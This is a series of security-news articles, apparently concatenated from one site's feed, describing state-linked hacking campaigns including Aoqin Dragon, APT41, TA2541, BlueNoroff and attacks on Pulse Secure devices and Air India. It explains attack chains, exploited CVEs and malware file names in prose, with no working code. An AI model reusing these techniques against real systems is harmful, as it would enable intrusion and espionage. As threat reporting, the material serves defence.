The main attack method, employed by this group between 2012 and 2015, involves Microsoft Office documents specially crafted for the exploitation of known vulnerabilities such as CVE-2012-0158 and CVE-2010-3333. This tactic was first detected in 2014, in a phishing campaign associated with the Advanced Persistent Threat (APT) operation known as Naikon.

SentinelLabs identified a second hacking method associated with Aoqin Dragon, based on hiding malicious executables in icons of fake antivirus products. After execution, a malware sample was delivered to the affected systems.

Starting in 2018, hackers left these tactics behind to resort to using a removable disk shortcut file; clicking this icon triggers a DLL hijack and loads an encrypted payload to deliver a backdoor. This malware runs under the name “Evernote Tray Application” and is executed at system startup; if any removable drives are detected, a copy of the payload will be created to expand the infection.

At least two backdoor variants used by this group have been identified. Known as Mongall, the first backdoor is a DLL injected into memory, protected with encryption and in constant maintenance since its launch in 2013.  This backdoor profiles the host and sends the details to the C&C using an encrypted channel.

Moreover, Heyoka is an open source exfiltration tool that uses spoofed DNS requests to create a two-way communication tunnel. Hackers employ Heyoka by copying files from compromised devices to prevent affected system administrators from detecting malicious activity in its early stages.

Aoqin Dragon is an unusual case, as it managed to go unnoticed for almost ten years. This has been possible due to the continuous evolution of its strategies and the periodic change of tactics, so it is highly likely that this cybercriminal group will change its behavior again in the near future.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post Education and telecommunication organizations based in Singapore, Hong Kong, Vietnam, Cambodia, and Australia were being spied on since 2013 appeared first on Information Security Newspaper | Hacking News.

After a lot of work of sample collection, analysis and follow-up, experts discovered some details about this RAT. While these phishing campaigns have not been attributed to a specific threat actor, all indications are that this operation is handled by a Chinese Advanced Persistent Threat (APT) group.

Simultaneous operations

As mentioned initially, hackers deployed four malicious email campaigns since the end of February, working simultaneously and using various lures to attract unsuspecting users.

Below, we’ll briefly review the features of each phishing attack based on evidence collected by Malwarebytes.

Interactive map

Hackers began distributing the RAT in a file identified as interactive_map_UA.exe, an alleged interactive map of Ukraine. The malware distribution started a few days after Russia invaded Ukraine, indicating that hackers tried to exploit the international conflict.

Update for Log4j

Another of the detected malicious campaigns uses a fake update to fix the Log4Shell vulnerability using a tar file identified as Patch_Log4j.tar.gz. Reports of these emails began in March and targeted at least 100 employees of RT TV, a media network funded by Russia’s government.

The messages appear to be sent by the Russian state defense conglomerate Rostec and include various images and PDFs to make it less suspicious.

The attached PDF, named О кибербезопасности 3.1.2022.pdf, contains instructions on how to run the fake patch, plus a bullet list with supposed safety tips.

Among these recommendations, hackers even added a link to VirusTotal announcing that the file has not been identified as malicious by any antivirus engine.

The message also includes links to the rostec.digital website, registered by threat actors and designed similarly to Rosec actual site. Interestingly, the fraudulent website was registered in mid-2021, months before the Russian invasion of Ukraine began.

Rostec

Hackers again use Rostec’s image in the third campaign, distributing a malicious file named build_rosteh4.exe.

Fake job offers

The latest detected campaign uses a Word document containing an alleged job offer at state oil company Saudi Aramco. The attack involves a self-extracting file using the Jitsi icon and creating a directory identified as Aramco in C:\ProgramData.

The document, written in English, includes a message in Russian asking the user to enable macros on their device.

A remote template injection then allows you to download a template embedded in a macro, which runs a macro to deliver a VBS script identified as HelpCenterUpdater.vbs to the %USER%\Documents\AdobeHelpCenter directory. The template also verifies the existence of %USER%\Documents\D5yrqBxW.txt; as long as it exists, the script will be delivered and executed.

The HelpCenterUpdater.vbs script delivers another obfuscated VBS file named UpdateRunner.vbs and downloads the primary payload, a DLL called GE40BRmRLP.dll, from your C&C server. Although they appear to share code, the script provides an EXE instead of a DLL in another related payload.  

The UpdateRunner.vbs script is responsible for running the DLL through rundll32.exe.

The malicious DLL contains the code that communicates with the C&C server and executes the received commands.

The campaign is still active and relatively prosperous, although many details remain unknown, and it is difficult to know what specific purposes the attackers are pursuing. Malwarebytes has committed to continue monitoring this campaign and the malware used by hackers.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post How hackers took control of 100 email accounts of employees of RT and other Russian organizations for cyber spying purposes? appeared first on Information Security Newspaper | Hacking News.

This group is known for using various malware strains and distributing them in complex attack chains. According to the Cybereason report, it all starts with the exploitation of multiple vulnerabilities in an enterprise resource planning tool. Hackers then search for a file identified as gthread-3.6.dll in the VMware Tools folder; this allows you to inject other payloads such as webshells and credential dump tools.

Threat actors also strive to hide their malicious activity; among the techniques used by APT41, the use of the Windows Server Common Log File System (CLFS) stands out, since it uses an undocumented file format that can be accessed through APIs but cannot be analyzed, allowing hackers to hide their malicious payloads, bypassing detection during years: “The attackers stole intellectual property such as confidential documents, blueprints, diagrams, formulas and proprietary data related to the manufacturing industry.”

Experts add that the attacks targeted technology and manufacturing companies, especially in East Asia, Western Europe and North America, all considered industrial hotspots globally.   

Industrial espionage is a practice commonly associated with hacking groups sponsored by China and its all-powerful Communist Party. In the past, the United States and other nation states have accused the Asian giant of facilitating cyberattack campaigns for the theft of confidential records, either by financing their activities or by simply turning a blind eye to these groups and operations.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How Chinese cyber army steals intellectual property from your company appeared first on Information Security Newspaper | Hacking News.

Reports suggest that the hackers in charge of this operation used a sophisticated variant of remote access Trojan (RAT), which allowed them to move laterally through the networks of the affected company. The characteristics of the attack indicate that there could be a group of advanced persistent threats (APT) behind this incident.

Investigators also believe it all may have started with an employee of this company downloading a pirated movie from an insecure website. This file contained a malicious payload that allowed hackers to take full control of the compromised networks. The download would have taken place more than half a year before the attack, allowing the attackers to know in detail all the internal processes of the platform in order to prepare the final intrusion.

The stolen cryptocurrencies were transferred to digital wallets controlled by the hackers, who waited up to six months to continue with the operation in order not to attract attention. Once this period had passed, they began to carry out multiple digital money laundering transactions.    

In addition to the five arrested, agents also identified the alleged operator of the illegal download website from which the malware that triggered the attack was distributed and four other individuals who would have received part of the stolen assets.

Once authorities had sufficient reasons, they obtained search warrants at four homes in the provinces of Tenerife, Bilbao and Barcelona, where four of the suspects were arrested and thousands of dollars in cash, electronic devices and some cryptocurrency wallets were seized. Just this week, in the last phase of the operation so far, another person has been investigated, who exercised functions of supervision of this fraudulent operation. 

The maximum penalty these individuals could reach if convicted is still unknown.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Five individuals arrested for the hacking and millionaire theft from a cryptocurrency exchange platform appeared first on Information Security Newspaper | Hacking News.

Unlike other similar groups, TA2541 does not usually use current events, topics of general interest or false promotions to attract potential victims. Instead, this group draws on topics related to transportation, aviation, commercial flights, tourism, and the airline industry in general. This campaign has been detected in countries in North America, Europe, Asia and the Middle East.

Below we can see an example of the emails sent by these hackers:

Proofpoint researchers detected that the emails used by this group contained a Google Drive URL to redirect affected users to an obfuscated Visual Basic Script (VBS) file; when executed, an executable file is extracted in text hosted on platforms such as Pastetext or GitHub.

Hackers run PowerShell on various Windows processes and query Windows Management Instrumentation (WMI) to search for security products on the affected system and try to disable them. Finally, hackers will collect information from the affected system before installing the RAT.

In addition to Google Drive, threat actors also use Discord links that redirect users to compressed files to AgentTesla or Imminent Monitor. TA2541 has also resorted to delivering attachments in emails that contain embedded executables containing the malicious URL.

VBS files are used to restore persistence with an AsyncRAT payload by adding the VBS file to the home directory pointing to a PowerShell script.

Experts also report that TA2541 has used more than a dozen different malware payloads since its emergence on the cybercriminal scene. Proofpoint has always resorted to commercial malware available for sale on criminal forums or in code repositories. While hackers currently mainly use AsyncRAT, they have also used other variants such as NetWire, Parallax or WSH RAT.

Given the characteristics of the malware variants used by this group, the researchers believe that these campaigns have as their main purpose the collection of information and remote access to infected systems. However, the researchers have not been able to confirm what the real goals of this group are.

This group has been a constant threat for the past few years and is highly likely to remain so in the medium term, so system administrators will need to remain alert to any potential ATTACK attempts related to TA2541.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post APT group TA2541 has been targeting thousands of organizations across aviation, aerospace, transportation, manufacturing, and defense industries worldwide appeared first on Information Security Newspaper | Hacking News.

The most recent hacking operation linked to BlueNoroff was identified at the end of 2021, and seems to show that the group has changed targets, focusing this time on the compromise of cryptocurrency exchange platforms via unsuspecting users.

For months, BlueNoroff operators began to closely analyze some virtual asset startups in order to elaborate a complex map of interactions between users and platforms and thus launch an unprecedented social engineering campaign, abusing the trust previously established between the actors of the processes linked to cryptocurrencies.

Experts mention that these attacks could start with a simple notification of a shared document through a friend/co-worker/teammate Google Drive account:

In the example above, we can see an “X” as an icon for an image that could not be uploaded when opening the email on an offline system. If the system had been connected to the internet, there would be an actual icon for a Google document uploaded from a third-party tracking server, immediately notifying the attacker that the potential victim opened the malicious email.

Another variant of the same attack could involve a forwarded email between different users. This attack is more advantageous for hackers, since the original email and forwarded content would seem to have been evaluated by some email security mechanism.

Although the SecureList example does not show the address of the person forwarding the malicious email because it is a real victim, it can be seen that the text reads the web address “sendgrid.net”. Although such a site does not exist in itself, it may be associated with Sendgrid, a firm dedicated to email marketing claims that claims be sending 90 billion emails every month.

Since this is a legitimate business, Gmail accepts the customization of MIME headers, which in turn allows forgery of legitimate emails. In this case, hackers are spoofing communications from the board of directors of Digital Currency Group, a venture capital firm that focuses on the digital currency market.

In addition to Digital Currency Group, BlueNoroff hackers are posing as partners or executives of firms such as Beenos, CoinSquad, Emurgo, Youbi Capital, Global Brain, CoinBig and Secure Digital Markets, as well as other related startups.

In some cases analyzed, hackers have also used compromised accounts on LinkedIn to establish contact with potential victims. This approach allows attackers to operate without drawing too much attention with massive spam campaigns or exploiting dangerous vulnerabilities, keeping a low profile until it’s time to actually attack.

This is not to say that vulnerabilities are not exploited in the process. BlueNoroff usually resorts to the exploitation of CVE-2017-0199 for the automatic execution of a remote script linked to an armed document. A sufficiently trained user could detect suspicious activity, although the attack is highly evasive.

To add another layer of evasion, if the document is opened in an offline environment, the target user will only find informative content on topics related to the attack, possibly taken from trusted sources.

If the entire contents of the document are displayed, a remote template that is another macro-enabled document will be displayed to the target user; the combination of both documents is critical to the attack.

The first of these documents contains two base64-encoded binary objects declared as image data, while the remote template contains a VBA macro that extracts one of these objects and generates a new process in notepad.exe to inject and execute the binary code. While these binaries are identified as JPEG files, they are actually PE files with modified headers.

The successful execution of this content triggers the installation of a malware variant capable of intercepting all kinds of information related to cryptocurrency addresses, access credentials and other data, thus constituting the final stage of the attack.

At the moment the exact scope of the attack is unknown, although it is believed that these malicious emails have been sent to a few thousand users around the world, which could be disastrous for cryptocurrency enthusiasts.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post BlueNoroff APT that hacked Bangladesh Bank is now only focusing on hacking cryptocurrency businesses and exchanges appeared first on Information Security Newspaper | Hacking News.

Tom Burt, Vice President of Customer Security and Trust at Microsoft, said, “Nickel has focused its efforts on public and private organizations, including diplomatic entities and foreign ministries in North America, Central America, South America, the Caribbean, Europe and Africa.”

The tech giant was able to take down the hackers’ infrastructure after a U.S. court issued an order stemming from the group’s actions. This order mentions that malicious websites were to be switched to secure servers, changing authorized name servers to NS104a.microsoftintemetsafety.net and NS104b.microsoftintemetsafety.net.

Microsoft’s security teams first detected the malicious behavior in 2016, while security firms such as Mandiant say Nickel’s existence is set back to 2010. In addition, for a couple of years the presence of this group was detected in attacks against European and Latin American countries, mainly operating malware delivery campaigns for network monitoring and data theft.

Nickel’s operations are funded by Chinese government and use previously compromised third-party VPN platforms, stolen credentials in phishing campaigns, and exploits targeting undated Exchange Server and SharePoint servers.

Since the investigation began, 24 criminal cases have been drawn up against these hackers and five against their sponsors, in addition to the removal of nearly 10,000 malicious websites and more than 500,000 online platforms potentially associated with this operation have been blocked.

Microsoft has made considerable efforts in the fight against cybercrime; A few months ago, the company seized the computing infrastructure of the Necurs botnet, used by threat actors for the distribution of malware payloads, which put millions of devices around the world at risk. According to Microsoft, at its highest point of activity Necurs was able to reach more than 40 million targets in less than two months.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How Microsoft counter attacked the infrastructure used by Chinese military hackers appeared first on Information Security Newspaper | Hacking News.

According to a recent security report, Chinese government has decided to resort to hacking, cyberwarfare and corporate espionage tactics to boost its ambitious defense program, compromising the systems of firms like Lockheed Martin in order to access classified information useful for their own purposes.

Peter Suciu, a renowned researcher, says China is an actor that should be taken seriously, especially on military issues. This is not the first such report, as since 2019 the Pentagon had accused the Chinese military of resorting to what they defined as “cyber theft” and other methods to achieve great improvements in military terms.

It all went back to 2007, when the firm Lockheed Martin discovered that a Chinese hacking group had been stealing technical documents related to the F-35 program, while a similar theft occurred when cybercriminals working for Beijing managed to compromise a network of an Australian subcontractor to the F-35.

These reports lead experts to believe that the Chinese have acquired a wealth of crucial information and data for these programs, including the development of the Chinese J-20 fighter jet, also known as “Mighty Dragon.” Suciu himself claims that the creation of these aircraft would have been impossible without the information stolen from Lockheed Martin.

In connection with these reports, Business Insider published a report detailing the clear similarities in appearance and engineering between American aircraft and those created by the Chinese government. In addition, the report not only emphasizes the similarity of these aircraft, but also states that the sensor systems used by the Chinese government are virtually identical to the electro-optical guidance employed by Lockheed Martin in the Lightning II model, further evidence of espionage against the company.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How Chinese APT hackers stole Lockheed Martin F-35 fighter plane to develop its own J-20 stealth fighter aircraft [VIDEO] appeared first on Information Security Newspaper | Hacking News.

A China-based group of threat actors is deploying an attack campaign against critical infrastructure in South Asia to compromise industrial control systems and extract sensitive information. Unfortunately, attacking critical infrastructure has become a common practice for organizations in these territories.

A Symantec report notes that its threat analysis division detected multiple attacks launched by a specific group against four critical infrastructure organizations in a South Asian country that will remain non-mentioned. The operation appears to be aimed at intelligence gathering, and would have started in November 2020, remaining active until early 2021.

According to the report, the IP addresses, malware used in the attacks and the location of the victims suggest that all four organizations were attacked by the same group. Some evidence suggests that the hackers are based in China, though researchers ruled out attributing this campaign to a specific group, at least for now.

Specifically, the hackers targeted a water company, an energy company, a communications company, and a national defense organization. At the moment it is unknown what information the hackers managed to steal, although more could be known about it after carefully analyzing the affected computers.

 For example, in the attack on the water company, hackers gained access to a machine involved in designing SCADA systems, suggesting that they may have had an interest in such systems. In the case of the power company, an infected device was used for the engineering design.

The group also abused some legitimate tools to achieve its goals, including Windows Management Instrumentation (WMI), ProcDump, PsExec, PAExec, and Mimikatz. Threat actors also abused a free media player for DLL hijacking and possibly Google Chrome Frame, a legitimate Internet Explorer plugin.

Eventually, hackers used backdoors and keyloggers, tools that allowed cybercriminals to steal credentials and other sensitive information.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Chinese cybercriminals attack electric companies, water treatment plants and more critical infrastructure appeared first on Information Security Newspaper | Hacking News.

A group of researchers discovered three different groups of threat actors linked to the Chinese government using previously seen Microsoft Exchange exploits to deploy powerful cyberattacks. These groups were identified as Emissary Panda (also known as APT27), Soft Cell and Naikon. As if that were not enough, Kaspersky researchers confirmed the detection of a fourth Chinese hacking group known as GhostEmperor using a rootkit for the compromise of Windows systems.

The report was prepared by security firm Cybereason, and states that these groups work closely with some Chinese militia cells. Researcher Yonatan Striem-Amit mentions that these attacks seem to be the starting point for the deployment of ambitious espionage campaigns by compromising personal devices.

The three groups have been tracked by the cybersecurity community for a couple of years now, when one of these groups was caught attacking a South Asian telecommunications company. It is worth mentioning that only two of these groups have been officially confirmed, since while experts attribute the malicious activity to Emissary Panda, other groups also use the OWA backdoor, used for the compromise of IIS and Exchange servers.

About Soft Cell, the research points out that this group is able to gain access by exploiting known vulnerabilities in Exchange for the installation of the China Chopper webshell. The hackers then employ the PcShell and Cobalt Strike backdoor for lateral movement, which eventually allows the theft of user credentials.On the other hand, experts described Naikon’s activity, mentioning that hackers use the Nebulae backdoor to access compromised systems, in addition to using PAExec and WMI for lateral movement and Modified MimiKatz to record keystrokes and intercept sensitive information.

Finally, the third group employs Exchange Server for initial access, deploying the custom .NET backdoor on more than 20 servers over the past 3 years. All of these attacks proved to be functional and were deployed in a very short period of time, showing the advanced capabilities of this hacking group.

For the researchers, it was somewhat unusual that three different hacking groups are deploying a campaign in an almost coordinated way, even compromising the same targets simultaneously. That is why it is difficult to conclude whether these groups are acting jointly or independently, although it is a fact that the three groups identified in this campaign are working closely with the Chinese military.

“These attacks are worrisome as they compromise the security of critical infrastructure and its suppliers. Espionage operations sponsored by state actors not only have a negative impact on trading partners, but also have the potential to threaten national security in affected territories,” the report concludes.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Exposing Chinese hackers: how they’re hacking telecom companies and listening to your calls appeared first on Information Security Newspaper | Hacking News.

These attacks are closely related to vulnerabilities tracked as CVE-2019-11510, CVE-2020-8260, and CVE-2021-2289, which allow threat actors to find initial access points and place webshells to gain backdoor access to the target system.

The agency published a detailed report on the 13 malware samples detected on the compromised devices so that IT administrators have the most updated information about this hacking campaign, its attack methods and indicators of compromise.

As mentioned at the outset, all samples analyzed by CISA were detected on Pulse Connect Secure devices and are mostly modified versions of legitimate scripts. These acted as webshells for the execution of remote commands that allow gaining persistence and obtain remote access to vulnerable systems, in addition to other utilities.

One of the malware samples analyzed in greater detail is described by CISA as a modified version of the Pulse Secure Perl module, the cornerstone in the system update process on these devices. Threat actors managed to modify the file to execute arbitrary commands remotely.

Among the legitimate Pulse Secure files modified by hackers are:

• licenseserverproto.cgi (STEADYPULSE)
• tnchcupdate.cgi
• healthcheck.cgi
• compcheckjs.cgi
• DSUpgrade.pm.current
• DSUpgrade.pm.rollback
• clear_log.sh (THINBLOOD LogWiper Utility Variant)
• compcheckjava.cgi (hardpulse)
• meeting_testjs.cgi (SLIGHTPULSE)

An earlier report by security firm Mandiant had also noted the detection of multiple incidents related to the modification of legitimate files in Pulse Secure. Mandiant researchers attributed this hacking campaign to a Chinese APT group dedicated to exploiting CVE-2021-22893. These reports mentioned that hackers were able to modify pulse secure system files to extract the credentials of affected users.

The Agency concluded its report by listing some security recommendations to mitigate the risk of attack:

• Keep signatures and antivirus solutions up-to-date
• Keep your operating system up to date
• Disable file and printer sharing services or use them only with strong passwords or with Active Directory authentication
• Restrict users’ permissions to install and run unwanted software applications and maintain a small number of administrative users

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post These 13 malware variants are used to hack and take control of Pulse Secure devices. Make sure your antivirus can detect them appeared first on Information Security Newspaper | Hacking News.

A devastating cyberattack was recently detected against SITA, a company that provides IT services for more than 90% of the world’s airlines. The incident led to a massive data breach that impacted more than 4 million users, and was attributed to a group of threat actors of Chinese origin tracked as APT41.

The incident, reported in early March, impacted major carriers such as Singapore Airlines and Malaysia Airlines, although at the time it was reported that the names of all affected carriers had not yet been revealed, at least so far. This week, Air India confirmed that its systems were compromised due to a cyberattack.

Nikita Rostovcev, security analyst at Group-IB, reported this severe incidente and shared details about hackers’ malicious activity.

Air India initially confirmed the incident in late May, although there was no clear information about the aftermath of the attack until Group-IB identified this incident as part of the engagement at SITA. According to Rostovcev, it took cybercriminals only 24 hours to spread the malicious payload of Cobalt Strike across the affected network after the initial compromise.

Shortly after the airline confirmed the intrusion, a post appeared on the dark web announcing the sale of a database allegedly associated with Air India. The vendors were demanding $ 3,000 USD in exchange for releasing access to this compromised information.

Although the first analyzes suggested that the leak was not legitimate, a subsequent investigation confirmed that the database was real and the information had been extracted by a hacking group sponsored by an unnamed state actor. The investigation also showed that the hackers sent Air India information to a C&C server and then began to move laterally through the compromised network. Group-IB identified at least 20 devices connected to the Air India network infected during this attack.

Regarding the attacking group, APT41 specializes in the deployment of cyber espionage campaigns and electronic fraud. A recent report from the U.S. Department of Justice (DOJ) notes that, during the last 12 months, this group provided other groups with the source code, certificate signatures and information necessary for the deployment of multiple attacks.  

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How Chinese hackers gained access to Air India’s network and customer database appeared first on Information Security Newspaper | Hacking News.